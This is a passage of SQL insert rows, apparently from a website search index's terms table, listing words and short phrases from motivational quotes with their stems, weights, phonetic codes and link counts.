(288, 'k2 item', 'k2 item', 0, 1, 1.2333, 'K350', 64, '*'),
(289, 'laugh', 'laugh', 0, 0, 0.3333, 'L200', 3, '*'),
(290, 'laugh eat', 'laugh eat', 0, 1, 1.3, 'L230', 3, '*'),
(291, 'laugh eat worry', 'laugh eat worry', 0, 1, 1.5, 'L236', 3, '*'),
(292, 'leave', 'leav', 0, 0, 0.3333, 'L100', 8, '*'),
(293, 'leave behind', 'leav behind', 0, 1, 1.4, 'L153', 5, '*'),
(294, 'leave behind us', 'leav behind us', 0, 1, 1.5, 'L1532', 5, '*'),
(295, 'leave every', 'leav every', 0, 1, 1.3667, 'L160', 5, '*'),
(296, 'leave every other', 'leav every other', 0, 1, 1.5667, 'L1636', 5, '*'),
(297, 'let', 'let', 0, 0, 0.2, 'L300', 36, '*'),
(298, 'let the', 'let the', 0, 1, 1.2333, 'L300', 13, '*'),
(299, 'let the brain', 'let the brain', 0, 1, 1.4333, 'L3165', 5, '*'),
(300, 'life', 'life', 0, 0, 0.2667, 'L100', 50, '*'),
(301, 'life before', 'life before', 0, 1, 1.3667, 'L160', 6, '*'),
(302, 'life before we', 'life before we', 0, 1, 1.4667, 'L160', 5, '*'),
(303, 'life think', 'life think', 0, 1, 1.3333, 'L1352', 5, '*'),
(304, 'life think of', 'life think of', 0, 1, 1.4333, 'L13521', 5, '*'),
(305, 'like', 'like', 0, 0, 0.2667, 'L200', 29, '*'),
(306, 'like something', 'like something', 0, 1, 1.4667, 'L25352', 5, '*'),
(307, 'like something change', 'like something change', 0, 1, 1.7, 'L2535252', 5, '*'),
(308, 'live', 'live', 0, 0, 0.2667, 'L100', 15, '*'),
(309, 'live on', 'live on', 0, 1, 1.2333, 'L150', 5, '*'),
(310, 'live on that', 'live on that', 0, 1, 1.4, 'L153', 5, '*'),
(311, 'living', 'live', 0, 0, 0.4, 'L152', 15, '*'),
(312, 'living the', 'live the', 0, 1, 1.3333, 'L1523', 6, '*'),
(313, 'living the world', 'live the world', 0, 1, 1.5333, 'L1523643', 5, '*'),
(314, 'longed', 'long', 0, 0, 0.4, 'L523', 5, '*'),
(315, 'longed for', 'long for', 0, 1, 1.3333, 'L52316', 5, '*'),
(316, 'longed for have', 'long for have', 0, 1, 1.5, 'L523161', 5, '*'),
(317, 'make', 'make', 0, 0, 0.2667, 'M200', 37, '*'),
(318, 'make that', 'make that', 0, 1, 1.3, 'M230', 5, '*'),
(319, 'make that one', 'make that one', 0, 1, 1.4333, 'M235', 5, '*'),
(321, 'may', 'mai', 0, 0, 0.2, 'M000', 27, '*'),
(322, 'may even', 'mai even', 0, 1, 1.2667, 'M150', 3, '*'),
(323, 'may even become', 'mai even become', 0, 1, 1.5, 'M15125', 3, '*'),
(324, 'melancholy', 'melancholi', 0, 0, 0.6667, 'M4524', 5, '*'),
(325, 'melancholy for', 'melancholi for', 0, 1, 1.4667, 'M452416', 5, '*'),
(326, 'melancholy for what', 'melancholi for what', 0, 1, 1.6333, 'M4524163', 5, '*'),
(327, 'most', 'most', 0, 0, 0.2667, 'M230', 21, '*'),
(328, 'most adaptable', 'most adaptable', 0, 1, 1.4667, 'M231314', 5, '*'),
(329, 'most adaptable to', 'most adaptable to', 0, 1, 1.5667, 'M2313143', 5, '*'),
(330, 'most intelligent', 'most intelligent', 0, 1, 1.5333, 'M23534253', 5, '*'),
(331, 'most intelligent that', 'most intelligent that', 0, 1, 1.7, 'M23534253', 5, '*'),
(332, 'most longed', 'most longed', 0, 1, 1.3667, 'M234523', 5, '*'),
(333, 'most longed for', 'most longed for', 0, 1, 1.5, 'M23452316', 5, '*'),
(334, 'muscles', 'muscl', 0, 0, 0.4667, 'M242', 5, '*'),
(335, 'muscles nerves', 'muscl nerves', 0, 1, 1.4667, 'M2425612', 5, '*'),
(336, 'muscles nerves every', 'muscl nerves every', 0, 1, 1.6667, 'M242561216', 5, '*'),
(337, 'must', 'must', 0, 0, 0.2667, 'M230', 42, '*'),
(338, 'must die', 'must die', 0, 1, 1.2667, 'M230', 5, '*'),
(339, 'must die to', 'must die to', 0, 1, 1.3667, 'M230', 5, '*'),
(340, 'nerves', 'nerv', 0, 0, 0.4, 'N612', 5, '*'),
(341, 'nerves every', 'nerv every', 0, 1, 1.4, 'N61216', 5, '*'),
(342, 'nerves every part', 'nerv every part', 0, 1, 1.5667, 'N61216163', 5, '*'),
(343, 'nor', 'nor', 0, 0, 0.2, 'N600', 9, '*'),
(344, 'nor the', 'nor the', 0, 1, 1.2333, 'N630', 5, '*'),
(345, 'nor the most', 'nor the most', 0, 1, 1.4, 'N63523', 5, '*'),
(346, 'not', 'not', 0, 0, 0.2, 'N300', 57, '*'),
(347, 'not come', 'not come', 0, 1, 1.2667, 'N325', 8, '*'),
(348, 'not come if', 'not come if', 0, 1, 1.3667, 'N3251', 5, '*'),
(349, 'not the', 'not the', 0, 1, 1.2333, 'N300', 14, '*'),
(350, 'not the strongest', 'not the strongest', 0, 1, 1.5667, 'N3236523', 5, '*'),
(354, 'nothing', 'noth', 0, 0, 0.4667, 'N352', 18, '*'),
(355, 'nothing it', 'noth it', 0, 1, 1.3333, 'N3523', 5, '*'),
(356, 'nothing it was', 'noth it was', 0, 1, 1.4667, 'N35232', 5, '*'),
(357, 'of', 'of', 0, 0, 0.1333, 'O100', 76, '*'),
(358, 'of it', 'of it', 0, 1, 1.1667, 'O130', 5, '*'),
(359, 'of it dream', 'of it dream', 0, 1, 1.3667, 'O1365', 5, '*'),
(360, 'of it live', 'of it live', 0, 1, 1.3333, 'O1341', 5, '*'),
(361, 'of ourselves', 'of ourselves', 0, 1, 1.4, 'O162412', 6, '*'),
(362, 'of ourselves we', 'of ourselves we', 0, 1, 1.5, 'O162412', 5, '*'),
(363, 'of that', 'of that', 0, 1, 1.2333, 'O130', 11, '*'),
(364, 'of that idea', 'of that idea', 0, 1, 1.4, 'O130', 5, '*'),
(365, 'of the', 'of the', 0, 1, 1.2, 'O130', 54, '*'),
(366, 'of the species', 'of the species', 0, 1, 1.4667, 'O13212', 5, '*'),
(367, 'of your', 'of your', 0, 1, 1.2333, 'O160', 30, '*'),
(368, 'of your body', 'of your body', 0, 1, 1.4, 'O1613', 5, '*'),
(369, 'on', 'on', 0, 0, 0.1333, 'O500', 52, '*'),
(370, 'on that', 'on that', 0, 1, 1.2333, 'O530', 5, '*'),
(371, 'on that idea', 'on that idea', 0, 1, 1.4, 'O530', 5, '*'),
(372, 'one', 'on', 0, 0, 0.2, 'O500', 39, '*'),
(373, 'one idea', 'on idea', 0, 1, 1.2667, 'O530', 5, '*'),
(374, 'one idea make', 'on idea make', 0, 1, 1.4333, 'O5352', 5, '*'),
(375, 'one idea your', 'on idea your', 0, 1, 1.4333, 'O536', 5, '*'),
(376, 'one life', 'on life', 0, 1, 1.2667, 'O541', 5, '*'),
(377, 'one life before', 'on life before', 0, 1, 1.5, 'O5416', 5, '*'),
(378, 'one that', 'on that', 0, 1, 1.2667, 'O530', 8, '*'),
(379, 'one that is', 'on that is', 0, 1, 1.3667, 'O532', 6, '*'),
(380, 'ones', 'on', 0, 0, 0.2667, 'O520', 8, '*'),
(381, 'ones we\'ve', 'on we', 0, 1, 1.3333, 'O521', 5, '*'),
(382, 'ones we\'ve been', 'on we been', 0, 1, 1.5, 'O5215', 5, '*'),
(383, 'or', 'or', 0, 0, 0.1333, 'O600', 51, '*'),
(384, 'or happy', 'or happy', 0, 1, 1.2667, 'O610', 4, '*'),
(385, 'or happy blockquote', 'or happy blockquote', 0, 1, 1.6333, 'O61423', 4, '*'),
(386, 'or some', 'or some', 0, 1, 1.2333, 'O625', 5, '*'),
(387, 'or some other', 'or some other', 0, 1, 1.4333, 'O62536', 5, '*'),
(388, 'other', 'other', 0, 0, 0.3333, 'O360', 23, '*'),
(389, 'other idea', 'other idea', 0, 1, 1.3333, 'O363', 5, '*'),
(390, 'other idea alone', 'other idea alone', 0, 1, 1.5333, 'O36345', 5, '*'),
(391, 'other person', 'other person', 0, 1, 1.4, 'O361625', 5, '*'),
(392, 'other person or', 'other person or', 0, 1, 1.5, 'O3616256', 5, '*'),
(393, 'other time', 'other time', 0, 1, 1.3333, 'O3635', 5, '*'),
(394, 'other time we', 'other time we', 0, 1, 1.4333, 'O3635', 5, '*'),
(395, 'other we', 'other we', 0, 1, 1.2667, 'O360', 3, '*'),
(396, 'other we may', 'other we may', 0, 1, 1.4, 'O365', 3, '*'),
(397, 'ourselves', 'ourselv', 0, 0, 0.6, 'O62412', 6, '*'),
(398, 'ourselves we', 'ourselv we', 0, 1, 1.4, 'O62412', 5, '*'),
(399, 'ourselves we must', 'ourselv we must', 0, 1, 1.5667, 'O62412523', 5, '*'),
(400, 'owes', 'ow', 0, 0, 0.2667, 'O200', 5, '*'),
(401, 'owes you', 'ow you', 0, 1, 1.2667, 'O200', 5, '*'),
(402, 'owes you a', 'ow you a', 0, 1, 1.3333, 'O200', 5, '*'),
(403, 'owes you nothing', 'ow you nothing', 0, 1, 1.5333, 'O25352', 5, '*'),
(404, 'own', 'own', 0, 0, 0.2, 'O500', 21, '*'),
(405, 'own powers', 'own powers', 0, 1, 1.3333, 'O5162', 4, '*'),
(406, 'own powers you', 'own powers you', 0, 1, 1.4667, 'O5162', 4, '*'),
(407, 'part', 'part', 0, 0, 0.2667, 'P630', 16, '*'),
(408, 'part of', 'part of', 0, 1, 1.2333, 'P631', 12, '*'),
(409, 'part of ourselves', 'part of ourselves', 0, 1, 1.5667, 'P63162412', 5, '*'),
(410, 'part of your', 'part of your', 0, 1, 1.4, 'P6316', 7, '*'),
(411, 'peoples', 'peopl', 0, 0, 0.4667, 'P420', 3, '*'),
(412, 'peoples cry', 'peopl cry', 0, 1, 1.3667, 'P426', 3, '*'),
(413, 'peoples cry laugh', 'peopl cry laugh', 0, 1, 1.5667, 'P42642', 3, '*'),
(414, 'perhaps', 'perhap', 0, 0, 0.4667, 'P612', 5, '*'),
(415, 'perhaps travel', 'perhap travel', 0, 1, 1.4667, 'P6123614', 3, '*'),
(416, 'perhaps travel cannot', 'perhap travel cannot', 0, 1, 1.7, 'P6123614253', 3, '*'),
(417, 'person', 'person', 0, 0, 0.4, 'P625', 14, '*'),
(418, 'person or', 'person or', 0, 1, 1.3, 'P6256', 5, '*'),
(419, 'person or some', 'person or some', 0, 1, 1.4667, 'P625625', 5, '*'),
(420, 'powers', 'power', 0, 0, 0.4, 'P620', 5, '*'),
(421, 'powers you', 'power you', 0, 1, 1.3333, 'P620', 4, '*'),
(422, 'powers you cannot', 'power you cannot', 0, 1, 1.5667, 'P6253', 4, '*'),
(423, 'prevent', 'prevent', 0, 0, 0.4667, 'P6153', 4, '*'),
(424, 'prevent bigotry', 'prevent bigotry', 0, 1, 1.5, 'P61531236', 3, '*'),
(425, 'prevent bigotry but', 'prevent bigotry but', 0, 1, 1.6333, 'P6153123613', 3, '*'),
(426, 'reasonable', 'reason', 0, 0, 0.6667, 'R2514', 4, '*'),
(427, 'reasonable confidence', 'reason confidence', 0, 1, 1.7, 'R2514251352', 4, '*'),
(428, 'reasonable confidence in', 'reason confidence in', 0, 1, 1.8, 'R25142513525', 4, '*'),
(429, 'saying', 'sai', 0, 0, 0.4, 'S520', 16, '*'),
(430, 'saying the', 'sai the', 0, 1, 1.3333, 'S523', 5, '*'),
(431, 'saying the world', 'sai the world', 0, 1, 1.5333, 'S523643', 5, '*'),
(432, 'seek', 'seek', 0, 0, 0.2667, 'S000', 7, '*'),
(433, 'some', 'some', 0, 0, 0.2667, 'S500', 20, '*'),
(434, 'some other', 'some other', 0, 1, 1.3333, 'S536', 5, '*'),
(435, 'some other person', 'some other person', 0, 1, 1.5667, 'S5361625', 5, '*'),
(436, 'some other time', 'some other time', 0, 1, 1.5, 'S53635', 5, '*'),
(437, 'something', 'someth', 0, 0, 0.6, 'S5352', 19, '*'),
(438, 'something change', 'someth change', 0, 1, 1.5333, 'S535252', 5, '*'),
(439, 'something change it', 'someth change it', 0, 1, 1.6333, 'S5352523', 5, '*'),
(440, 'species', 'speci', 0, 0, 0.4667, 'S120', 5, '*'),
(441, 'species that', 'speci that', 0, 1, 1.4, 'S123', 5, '*'),
(442, 'species that survives', 'speci that survives', 0, 1, 1.7, 'S1232612', 5, '*'),
(443, 'strongest', 'strongest', 0, 0, 0.6, 'S36523', 5, '*'),
(444, 'strongest of', 'strongest of', 0, 1, 1.4, 'S365231', 5, '*'),
(445, 'strongest of the', 'strongest of the', 0, 1, 1.5333, 'S3652313', 5, '*'),
(446, 'success', 'success', 0, 0, 0.4667, 'S000', 10, '*'),
(447, 'successful', 'success', 0, 0, 0.6667, 'S140', 7, '*'),
(448, 'successful or', 'success or', 0, 1, 1.4333, 'S146', 4, '*'),
(449, 'successful or happy', 'success or happy', 0, 1, 1.6333, 'S1461', 4, '*'),
(450, 'survives', 'surviv', 0, 0, 0.5333, 'S612', 6, '*'),
(451, 'survives it', 'surviv it', 0, 1, 1.3667, 'S6123', 5, '*'),
(452, 'survives it is', 'surviv it is', 0, 1, 1.4667, 'S61232', 5, '*'),
(453, 'survives nor', 'surviv nor', 0, 1, 1.4, 'S61256', 5, '*'),
(454, 'survives nor the', 'surviv nor the', 0, 1, 1.5333, 'S612563', 5, '*'),
(455, 'take', 'take', 0, 0, 0.2667, 'T200', 39, '*'),
(456, 'take up', 'take up', 0, 1, 1.2333, 'T210', 7, '*'),
(457, 'take up one', 'take up one', 0, 1, 1.3667, 'T215', 5, '*'),
(458, 'that', 'that', 0, 0, 0.2667, 'T000', 58, '*'),
(459, 'that all', 'that all', 0, 1, 1.2667, 'T400', 8, '*'),
(460, 'that all peoples', 'that all peoples', 0, 1, 1.5333, 'T4142', 3, '*'),
(461, 'that idea', 'that idea', 0, 1, 1.3, 'T000', 5, '*'),
(462, 'that idea and', 'that idea and', 0, 1, 1.4333, 'T530', 5, '*'),
(463, 'that idea let', 'that idea let', 0, 1, 1.4333, 'T430', 5, '*'),
(464, 'that if', 'that if', 0, 1, 1.2333, 'T100', 6, '*'),
(465, 'that if we', 'that if we', 0, 1, 1.3333, 'T100', 3, '*'),
(466, 'that is', 'that is', 0, 1, 1.2333, 'T200', 34, '*'),
(467, 'that is the', 'that is the', 0, 1, 1.3667, 'T230', 11, '*'),
(468, 'that one', 'that one', 0, 1, 1.2667, 'T500', 6, '*'),
(469, 'that one idea', 'that one idea', 0, 1, 1.4333, 'T530', 5, '*'),
(470, 'that survives', 'that survives', 0, 1, 1.4333, 'T2612', 5, '*'),
(471, 'that survives it', 'that survives it', 0, 1, 1.5333, 'T26123', 5, '*'),
(472, 'that survives nor', 'that survives nor', 0, 1, 1.5667, 'T261256', 5, '*'),
(473, 'that we', 'that we', 0, 1, 1.2333, 'T000', 13, '*'),
(474, 'that we seek', 'that we seek', 0, 1, 1.4, 'T200', 5, '*'),
(475, 'the', 'the', 0, 0, 0.2, 'T000', 64, '*'),
(476, 'the brain', 'the brain', 0, 1, 1.3, 'T165', 5, '*'),
(477, 'the brain muscles', 'the brain muscles', 0, 1, 1.5667, 'T165242', 5, '*'),
(478, 'the change', 'the change', 0, 1, 1.3333, 'T252', 5, '*'),
(479, 'the change that', 'the change that', 0, 1, 1.5, 'T2523', 5, '*'),
(480, 'the idea', 'the idea', 0, 1, 1.2667, 'T000', 3, '*'),
(481, 'the idea that', 'the idea that', 0, 1, 1.4333, 'T000', 3, '*'),
(482, 'the most', 'the most', 0, 1, 1.2667, 'T523', 12, '*'),
(483, 'the most adaptable', 'the most adaptable', 0, 1, 1.6, 'T5231314', 5, '*'),
(484, 'the most intelligent', 'the most intelligent', 0, 1, 1.6667, 'T523534253', 5, '*'),
(485, 'the most longed', 'the most longed', 0, 1, 1.5, 'T5234523', 5, '*'),
(486, 'the one', 'the one', 0, 1, 1.2333, 'T500', 8, '*'),
(487, 'the one that', 'the one that', 0, 1, 1.4, 'T530', 6, '*'),
(488, 'the ones', 'the ones', 0, 1, 1.2667, 'T520', 8, '*'),
(489, 'the ones we\'ve', 'the ones we', 0, 1, 1.4667, 'T521', 5, '*'),
(490, 'the species', 'the species', 0, 1, 1.3667, 'T212', 5, '*'),
(491, 'the species that', 'the species that', 0, 1, 1.5333, 'T2123', 5, '*'),
(492, 'the strongest', 'the strongest', 0, 1, 1.4333, 'T236523', 5, '*'),
(493, 'the strongest of', 'the strongest of', 0, 1, 1.5333, 'T2365231', 5, '*'),
(494, 'the way', 'the way', 0, 1, 1.2333, 'T000', 9, '*'),
(495, 'the way to', 'the way to', 0, 1, 1.3333, 'T000', 5, '*'),
(496, 'the world', 'the world', 0, 1, 1.3, 'T643', 16, '*'),
(497, 'the world owes', 'the world owes', 0, 1, 1.4667, 'T6432', 5, '*'),
(498, 'their', 'their', 0, 0, 0.3333, 'T600', 39, '*'),
(499, 'their melancholy', 'their melancholy', 0, 1, 1.5333, 'T654524', 5, '*'),
(500, 'their melancholy for', 'their melancholy for', 0, 1, 1.6667, 'T65452416', 5, '*'),
(501, 'think', 'think', 0, 0, 0.3333, 'T520', 10, '*'),
(502, 'think of', 'think of', 0, 1, 1.2667, 'T521', 5, '*'),
(503, 'think of it', 'think of it', 0, 1, 1.3667, 'T5213', 5, '*'),
(504, 'this', 'thi', 0, 0, 0.2667, 'T200', 43, '*'),
(505, 'this is', 'thi is', 0, 1, 1.2333, 'T200', 21, '*'),
(506, 'this is the', 'thi is the', 0, 1, 1.3667, 'T230', 8, '*'),
(507, 'time', 'time', 0, 0, 0.2667, 'T500', 35, '*'),
(508, 'time we', 'time we', 0, 1, 1.2333, 'T500', 6, '*'),
(509, 'time we are', 'time we are', 0, 1, 1.3667, 'T560', 5, '*'),
(510, 'to', 'to', 0, 0, 0.1333, 'T000', 62, '*'),
(511, 'to change', 'to change', 0, 1, 1.3, 'T252', 9, '*'),
(512, 'to change all', 'to change all', 0, 1, 1.4333, 'T2524', 5, '*'),
(513, 'to one', 'to one', 0, 1, 1.2, 'T500', 6, '*'),
(514, 'to one life', 'to one life', 0, 1, 1.3667, 'T541', 5, '*'),
(515, 'to success', 'to success', 0, 1, 1.3333, 'T200', 6, '*'),
(516, 'travel', 'travel', 0, 0, 0.4, 'T614', 3, '*'),
(517, 'travel cannot', 'travel cannot', 0, 1, 1.4333, 'T614253', 3, '*'),
(518, 'travel cannot prevent', 'travel cannot prevent', 0, 1, 1.7, 'T61425316153', 3, '*'),
(519, 'try', 'try', 0, 0, 0.2, 'T600', 9, '*'),
(520, 'try and', 'try and', 0, 1, 1.2333, 'T653', 3, '*'),
(521, 'try and understand', 'try and understand', 0, 1, 1.6, 'T6535362353', 3, '*'),
(522, 'understand', 'understand', 0, 0, 0.6667, 'U5362353', 12, '*'),
(523, 'understand each', 'understand each', 0, 1, 1.5, 'U53623532', 3, '*'),
(524, 'understand each other', 'understand each other', 0, 1, 1.7, 'U5362353236', 3, '*'),
(525, 'unknown', 'unknown', 0, 0, 0.4667, 'U525', 4, '*'),
(526, 'unknown believe', 'unknown believe', 0, 1, 1.5, 'U525141', 4, '*'),
(527, 'unknown believe in', 'unknown believe in', 0, 1, 1.6, 'U5251415', 4, '*'),
(528, 'up', 'up', 0, 0, 0.1333, 'U100', 38, '*'),
(529, 'up one', 'up one', 0, 1, 1.2, 'U150', 5, '*'),
(530, 'up one idea', 'up one idea', 0, 1, 1.3667, 'U153', 5, '*'),
(531, 'us', 'us', 0, 0, 0.1333, 'U200', 32, '*'),
(532, 'us is', 'us is', 0, 1, 1.1667, 'U200', 6, '*'),
(533, 'us is a', 'us is a', 0, 1, 1.2333, 'U200', 5, '*'),
(534, 'wait', 'wait', 0, 0, 0.2667, 'W300', 8, '*'),
(535, 'wait for', 'wait for', 0, 1, 1.2667, 'W316', 6, '*'),
(536, 'wait for some', 'wait for some', 0, 1, 1.4333, 'W31625', 5, '*'),
(537, 'waiting', 'wait', 0, 0, 0.4667, 'W352', 7, '*'),
(538, 'waiting for', 'wait for', 0, 1, 1.3667, 'W35216', 7, '*'),
(539, 'waiting for we', 'wait for we', 0, 1, 1.4667, 'W35216', 5, '*'),
(540, 'was', 'wa', 0, 0, 0.2, 'W200', 32, '*'),
(541, 'was here', 'wa here', 0, 1, 1.2667, 'W260', 5, '*'),
(542, 'was here first', 'wa here first', 0, 1, 1.4667, 'W261623', 5, '*'),
(543, 'way', 'wai', 0, 0, 0.2, 'W000', 24, '*'),
(544, 'way to', 'wai to', 0, 1, 1.2, 'W300', 12, '*'),
(545, 'way to success', 'wai to success', 0, 1, 1.4667, 'W320', 5, '*'),
(546, 'we', 'we', 0, 0, 0.1333, 'W000', 41, '*'),
(547, 'we are', 'we are', 0, 1, 1.2, 'W600', 15, '*'),
(548, 'we are the', 'we are the', 0, 1, 1.3333, 'W630', 5, '*'),
(549, 'we can', 'we can', 0, 1, 1.2, 'W250', 8, '*'),
(550, 'we can enter', 'we can enter', 0, 1, 1.4, 'W2536', 5, '*'),
(551, 'we leave', 'we leave', 0, 1, 1.2667, 'W410', 5, '*'),
(552, 'we leave behind', 'we leave behind', 0, 1, 1.5, 'W4153', 5, '*'),
(553, 'we may', 'we may', 0, 1, 1.2, 'W500', 3, '*'),
(554, 'we may even', 'we may even', 0, 1, 1.3667, 'W515', 3, '*'),
(555, 'we must', 'we must', 0, 1, 1.2333, 'W523', 8, '*'),
(556, 'we must die', 'we must die', 0, 1, 1.3667, 'W523', 5, '*'),
(557, 'we seek', 'we seek', 0, 1, 1.2333, 'W200', 5, '*'),
(558, 'we try', 'we try', 0, 1, 1.2, 'W360', 3, '*'),
(559, 'we try and', 'we try and', 0, 1, 1.3333, 'W3653', 3, '*'),
(560, 'we wait', 'we wait', 0, 1, 1.2333, 'W300', 5, '*'),
(561, 'we wait for', 'we wait for', 0, 1, 1.3667, 'W316', 5, '*'),
(562, 'we\'ve', 'we', 0, 0, 0.3333, 'W100', 8, '*'),
(563, 'we\'ve been', 'we been', 0, 1, 1.3333, 'W150', 5, '*'),
(564, 'we\'ve been waiting', 'we been waiting', 0, 1, 1.6, 'W15352', 5, '*'),
(565, 'what', 'what', 0, 0, 0.2667, 'W300', 51, '*'),
(566, 'what we', 'what we', 0, 1, 1.2333, 'W300', 6, '*'),
(567, 'what we leave', 'what we leave', 0, 1, 1.4333, 'W341', 5, '*'),
(568, 'will', 'will', 0, 0, 0.2667, 'W400', 57, '*'),
(569, 'will not', 'will not', 0, 1, 1.2667, 'W453', 21, '*'),
(570, 'will not come', 'will not come', 0, 1, 1.4333, 'W45325', 7, '*'),
(572, 'without', 'without', 0, 0, 0.4667, 'W300', 21, '*'),
(573, 'without a', 'without a', 0, 1, 1.3, 'W300', 5, '*'),
(574, 'without a humble', 'without a humble', 0, 1, 1.5333, 'W3514', 4, '*'),
(575, 'world', 'world', 0, 0, 0.3333, 'W643', 19, '*'),
(576, 'world owes', 'world owes', 0, 1, 1.3333, 'W6432', 5, '*'),
(577, 'world owes you', 'world owes you', 0, 1, 1.4667, 'W6432', 5, '*'),
(578, 'worry', 'worri', 0, 0, 0.3333, 'W600', 4, '*'),
(579, 'worry and', 'worri and', 0, 1, 1.3, 'W653', 4, '*'),
(580, 'worry and die', 'worri and die', 0, 1, 1.4333, 'W653', 3, '*'),
(581, 'you', 'you', 0, 0, 0.2, 'Y000', 62, '*'),
(582, 'you a', 'you a', 0, 1, 1.1667, 'Y000', 12, '*'),
(583, 'you a living', 'you a living', 0, 1, 1.4, 'Y4152', 5, '*'),
(584, 'you can\'t', 'you can', 0, 1, 1.3, 'Y253', 16, '*'),
(585, 'you can\'t change', 'you can change', 0, 1, 1.5333, 'Y253252', 5, '*'),
(586, 'you cannot', 'you cannot', 0, 1, 1.3333, 'Y253', 16, '*'),
(587, 'you cannot be', 'you cannot be', 0, 1, 1.4333, 'Y2531', 7, '*'),
(588, 'you don\'t', 'you don', 0, 1, 1.3, 'Y353', 21, '*'),
(589, 'you don\'t like', 'you don like', 0, 1, 1.4667, 'Y35342', 5, '*'),
(590, 'you nothing', 'you nothing', 0, 1, 1.3667, 'Y5352', 5, '*'),
(591, 'you nothing it', 'you nothing it', 0, 1, 1.4667, 'Y53523', 5, '*'),
(592, 'your', 'your', 0, 0, 0.2667, 'Y600', 62, '*'),
(593, 'your abilities', 'your abilities', 0, 1, 1.4667, 'Y61432', 4, '*'),
(594, 'your abilities without', 'your abilities without', 0, 1, 1.7333, 'Y614323', 4, '*'),
(595, 'your attitude', 'your attitude', 0, 1, 1.4333, 'Y630', 6, '*'),
(596, 'your attitude change', 'your attitude change', 0, 1, 1.6667, 'Y63252', 5, '*'),
(597, 'your body', 'your body', 0, 1, 1.3, 'Y613', 11, '*'),
(598, 'your body be', 'your body be', 0, 1, 1.4, 'Y6131', 5, '*'),
(599, 'your life', 'your life', 0, 1, 1.3, 'Y641', 39, '*'),
(600, 'your life think', 'your life think', 0, 1, 1.5, 'Y641352', 5, '*'),
(601, 'your own', 'your own', 0, 1, 1.2667, 'Y650', 13, '*'),
(602, 'your own powers', 'your own powers', 0, 1, 1.5, 'Y65162', 4, '*'),
(603, 'yourself', 'yourself', 0, 0, 0.5333, 'Y6241', 32, '*'),
(604, 'yourself have', 'yourself have', 0, 1, 1.4333, 'Y6241', 4, '*'),
(605, 'yourself have faith', 'yourself have faith', 0, 1, 1.6333, 'Y62413', 4, '*'),
(1024, '1', '1', 0, 0, 0.1, '', 35, '*'),
(1027, '1 value', '1 value', 0, 1, 1.2333, 'V400', 2, '*'),
(1028, '1 value 1', '1 value 1', 0, 1, 1.3, 'V400', 2, '*'),
(1029, 'a victim', 'a victim', 0, 1, 1.2667, 'A1235', 2, '*'),
(1030, 'a victim accept', 'a victim accept', 0, 1, 1.5, 'A1235213', 2, '*'),
(1031, 'accept', 'accept', 0, 0, 0.4, 'A213', 7, '*'),
(1032, 'accept no', 'accept no', 0, 1, 1.3, 'A2135', 2, '*'),
(1033, 'accept no one\'s', 'accept no one', 0, 1, 1.5, 'A21352', 2, '*'),
(1034, 'allow', 'allow', 0, 0, 0.3333, 'A400', 12, '*'),
(1035, 'allow yourself', 'allow yourself', 0, 1, 1.4667, 'A46241', 3, '*'),
(1036, 'allow yourself to', 'allow yourself to', 0, 1, 1.5667, 'A462413', 3, '*'),
(1039, 'be bullied', 'be bullied', 0, 1, 1.3333, 'B430', 2, '*'),
(1040, 'be bullied into', 'be bullied into', 0, 1, 1.5, 'B4353', 2, '*'),
(1041, 'be made', 'be made', 0, 1, 1.2333, 'B530', 3, '*'),
(1042, 'be made a', 'be made a', 0, 1, 1.3, 'B530', 2, '*'),
(1044, 'bullied', 'bulli', 0, 0, 0.4667, 'B430', 2, '*'),
(1045, 'bullied into', 'bulli into', 0, 1, 1.4, 'B4353', 2, '*'),
(1046, 'bullied into silence', 'bulli into silence', 0, 1, 1.6667, 'B43532452', 2, '*'),
(1049, 'concentrate', 'concentr', 0, 0, 0.7333, 'C525363', 2, '*'),
(1050, 'concentrate the', 'concentr the', 0, 1, 1.5, 'C525363', 2, '*'),
(1051, 'concentrate the mind', 'concentr the mind', 0, 1, 1.6667, 'C52536353', 2, '*'),
(1052, 'define', 'defin', 0, 0, 0.4, 'D150', 3, '*'),
(1053, 'define yourself', 'defin yourself', 0, 1, 1.5, 'D156241', 2, '*'),
(1054, 'define yourself don\'t', 'defin yourself don', 0, 1, 1.7, 'D156241353', 2, '*'),
(1055, 'definition', 'definit', 0, 0, 0.6667, 'D1535', 2, '*'),
(1056, 'definition of', 'definit of', 0, 1, 1.4333, 'D15351', 2, '*'),
(1057, 'definition of your', 'definit of your', 0, 1, 1.6, 'D153516', 2, '*'),
(1058, 'do', 'do', 0, 0, 0.1333, 'D000', 38, '*'),
(1059, 'do not', 'do not', 0, 1, 1.2, 'D530', 13, '*'),
(1060, 'do not dream', 'do not dream', 0, 1, 1.4, 'D5365', 2, '*'),
(1061, 'do not dwell', 'do not dwell', 0, 1, 1.4, 'D534', 2, '*'),
(1062, 'dream of the', 'dream of the', 0, 1, 1.4, 'D6513', 2, '*'),
(1063, 'dwell', 'dwell', 0, 0, 0.3333, 'D400', 2, '*'),
(1064, 'dwell in', 'dwell in', 0, 1, 1.2667, 'D450', 2, '*'),
(1065, 'dwell in the', 'dwell in the', 0, 1, 1.4, 'D453', 2, '*'),
(1067, 'finances', 'financ', 0, 0, 0.5333, 'F520', 5, '*'),
(1068, 'future', 'futur', 0, 0, 0.4, 'F360', 15, '*'),
(1069, 'future concentrate', 'futur concentrate', 0, 1, 1.6, 'F362525363', 2, '*'),
(1070, 'future concentrate the', 'futur concentrate the', 0, 1, 1.7333, 'F362525363', 2, '*'),
(1071, 'id', 'id', 0, 0, 0.1333, 'I300', 2, '*'),
(1072, 'id 1', 'id 1', 0, 1, 1.1333, 'I300', 2, '*'),
(1073, 'id 1 value', 'id 1 value', 0, 1, 1.3333, 'I314', 2, '*'),
(1074, 'in the', 'in the', 0, 1, 1.2, 'I530', 55, '*'),
(1075, 'in the past', 'in the past', 0, 1, 1.3667, 'I53123', 3, '*'),
(1076, 'into', 'into', 0, 0, 0.2667, 'I530', 33, '*'),
(1077, 'into silence', 'into silence', 0, 1, 1.4, 'I532452', 2, '*'),
(1078, 'into silence never', 'into silence never', 0, 1, 1.6, 'I532452516', 2, '*'),
(1081, 'life define', 'life define', 0, 1, 1.3667, 'L1315', 3, '*'),
(1082, 'life define yourself', 'life define yourself', 0, 1, 1.6667, 'L13156241', 2, '*'),
(1083, 'made', 'made', 0, 0, 0.2667, 'M300', 15, '*'),
(1084, 'made a', 'made a', 0, 1, 1.2, 'M300', 4, '*'),
(1085, 'made a victim', 'made a victim', 0, 1, 1.4333, 'M31235', 2, '*'),
(1087, 'mind', 'mind', 0, 0, 0.2667, 'M300', 15, '*'),
